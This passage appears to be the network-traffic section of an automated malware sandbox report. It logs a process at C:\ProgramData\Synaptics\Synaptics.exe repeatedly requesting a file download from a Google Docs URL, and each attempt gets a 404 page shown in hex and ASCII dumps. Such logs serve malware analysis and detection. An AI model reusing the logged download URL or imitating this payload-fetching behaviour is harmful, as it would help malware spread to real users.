                                                                                                                                                                                        2022-05-17 11:31:58 UTC667INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:58 UTC667INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        221192.168.2.349998142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC664OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC667INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-W3UYFv+Ie1xzxHp/UhUuVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC669INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:59 UTC669INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 76 51 70 44 6a 4e 4e 6c 62 33 33 6f 79 78 5a 61 54 35 52 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xvQpDjNNlb33oyxZaT5Rfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:59 UTC670INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:59 UTC670INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        222192.168.2.349999142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC667OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC670INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JbNj1tL3fqtTSYV51b5HHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC672INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:59 UTC672INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2b 30 4f 4d 39 58 38 53 53 37 4a 59 34 67 2f 4b 72 67 5a 37 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+0OM9X8SS7JY4g/KrgZ7AQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:59 UTC673INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:59 UTC673INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        223192.168.2.350000142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC670OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC674INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LpbUQrySwB8DQzYgaGEAmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC675INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 71 43 70 6f 45 6f 32 6f 36 75 33 62 38 69 78 73 4b 36 4e 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KqCpoEo2o6u3b8ixsK6Njg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:59 UTC676INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:59 UTC677INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        224192.168.2.350001142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC673OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC677INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-afJFBIBpNVaRg6oIXRa0Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC678INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 6f 61 6f 56 4b 35 6b 30 69 2f 6a 71 4f 4c 55 54 42 34 64 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/oaoVK5k0i/jqOLUTB4d1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:59 UTC680INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:59 UTC680INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        225192.168.2.350002142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC677OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC680INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kIIsZzdh8W7MHrwsS2OBfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC681INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:59 UTC681INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 30 6f 72 6a 73 38 6a 43 57 4f 56 6a 4b 6d 6d 2f 47 35 6f 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X0orjs8jCWOVjKmm/G5oog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
